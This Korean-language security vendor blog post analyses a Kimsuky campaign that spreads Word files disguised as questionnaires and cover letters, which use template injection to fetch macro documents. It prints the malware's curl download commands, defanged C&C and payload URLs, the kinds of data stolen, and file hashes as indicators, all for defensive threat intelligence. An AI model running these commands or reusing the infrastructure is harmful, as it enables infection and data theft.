Posted By ,

정상 문서로 위장한 악성코드(kimsuky)

ASEC 분석팀은 최근 <원고 청탁서로 위장한 악성코드 (안보 분야 종사자 대상)>에서 소개한 악성코드가 안보 분야 뿐만 아니라 방송 및 일반 기업들을 타겟으로 유포 중임을 확인하였다. 해당 악성 문서들은 모두 위 블로그 글에서 소개한 악성코드와 동일하게 템플릿 인젝션(Template Injection) 기법을 사용하고 있으며 악성 워드 매크로 문서를 다운로드 받아 실행한다. 확인된 유포 파일명은 다음과 같다.

  • [kbs 일요진단]질문지.docx
  • ** 자기소개서.docx
  • app-planning – copy.docx
\word\_rels\settings.xml.rels 에서 확인되는 External URL

공격자는 악성 매크로 코드가 실행될 수 있도록 매크로 실행을 유도하는 이미지를 사용하였다. 해당 이미지는 과거부터 꾸준히 사용하고 있으며 모두 동일한 공격자로 추정된다.

공격자 메일에 회신한 경우에 외부 링크로 제공되는 워드문서 (Kimsuky) – ASEC BLOG
ASEC 분석팀은 대북 관련 내용의 악성 워드 문서가 꾸준히 유포되고 있음을 확인하였다. 확인된 워드 문서는 안랩 TIP에 공개된 “2021년 Kimsuky 공격 워드(word) 문서 사례 총 정리 분석 보고서” 및 ‘외교/안보 관련 내용의 워드문서 유포 중’ 에서 공유한 워드 문서 유형과 더불어 mshta를 이용하는 유형이 확인되었다. 악성 워드 문서는 다음과 같이 다양한 파일명으로 유포되고 있다. 김** 이력서(한미**협회,220711).doc 양**_**재단 중간보고(220716).doc 자문 요청서.doc 유형 1 자문 요청…
매크로 실행 유도 이미지

추가 확인된 악성 워드 매크로 문서 다운로드 URL은 다음과 같다.

  • hxxp://www.hydrotec.co[.]kr/bbs/img/cmg/upload2/init.dotm
  • hxxp://www.hydrotec.co[.]kr/bbs/img/cmg/upload3/init.dotm
  • hxxp://jooshineng[.]com/gnuboard4/adm/img/ghp/up/state.dotm
  • hxxp://gdtech[.]kr/gnuboard4/adm/cmg/attatch/init.dotm
  • hxxp://ddim.co[.]kr/gnuboard4/adm/cmg/upload/init.dotm

다운로드 받은 문서 파일에 포함된 악성 매크로가 실행되면 curl 명령어가 포함된 version.bat 파일을 생성 및 실행한다. 배치 파일에는 정상 문서와 추가 악성 스크립트를 다운로드 및 실행하는 코드가 존재한다. 사용된 curl 명령어는 다음과 같다.

  • curl -o “”” & fname & “”” hxxp://gdtech[.]kr/gnuboard4/adm/cmg/upload/state.docx
  • curl -o %temp%\temp.vbs hxxp://gdtech[.]kr/gnuboard4/adm/cmg/upload/list.php?query=60

확인된 정상 문서는 다음과 같이 자기소개서, 어플 제안서 등으로 위장하였다.

정상 문서-1
정상 문서-2
정상 문서-3

추가 악성 스크립트의 경우 기존과 동일하게 아래 정보들을 C&C 서버로 유출한다.

  • 감염 PC 시스템 정보
  • 시스템에 설치된 바이러스 백신 정보
  • 최근 열어본 워드 문서 목록
  • 시스템 내 다운로드 폴더 경로 정보
  • 실행중인 프로세스 정보
  • IE 관련 레지스트리키 수정
  • C&C 서버 연결 지속성을 위한 작업 스케줄러 등록

확인된 C&C 서버는 다음과 같다.

  • hxxp://gdtech[.]kr/gnuboard4/adm/cmg/upload/show.php
  • hxxp://ddim.co[.]kr/gnuboard4/adm/cmg/upload/show.php
  • hxxp://www.hydrotec.co[.]kr/bbs/img/cmg/upload3/show.php

최근 대북 관련 인사를 대상으로 하는 악성코드가 일반 기업 사용자에게도 유포되고 있어 사용자의 각별한 주의가 필요하다. 발신인을 알 수 없는 메일의 첨부파일 열람을 자제하고 오피스 문서에 포함된 매크로가 자동으로 실행되지 않도록 주의해야 한다.

[파일 진단]

  • Downloader/DOC.External (2023.02.03.03)
  • Downloader/DOC.Kimsuky (2023.02.07.00)

[IOC]

  • 55a46a2415d18093abcd59a0bf33d0a9 (docx)
  • 3cdf9f829ed03e1ac17b72b636d84d0b (dotm)
  • 873b2b0656ee9f6912390b5abc32b276 (dotm)
  • 83b4d96fc75f74bb589c28e8a9eddbbf (dotm)
  • 705ef00224f3f7b02e29f21eb6e10d02 (dotm)
  • hxxp://gdtech[.]kr/gnuboard4/adm/cmg/attatch/init.dotm
  • hxxp://ddim.co[.]kr/gnuboard4/adm/cmg/upload/init.dotm
  • hxxp://www.hydrotec.co[.]kr/bbs/img/cmg/upload2/init.dotm
  • hxxp://www.hydrotec.co[.]kr/bbs/img/cmg/upload3/init.dotm
  • hxxp://gdtech[.]kr/gnuboard4/adm/cmg/upload/list.php?query=60

 

연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.

 

Categories:악성코드 정보

Tagged as:,,

5 1 vote
별점 주기
Subscribe
Notify of
guest

0 댓글
Inline Feedbacks
View all comments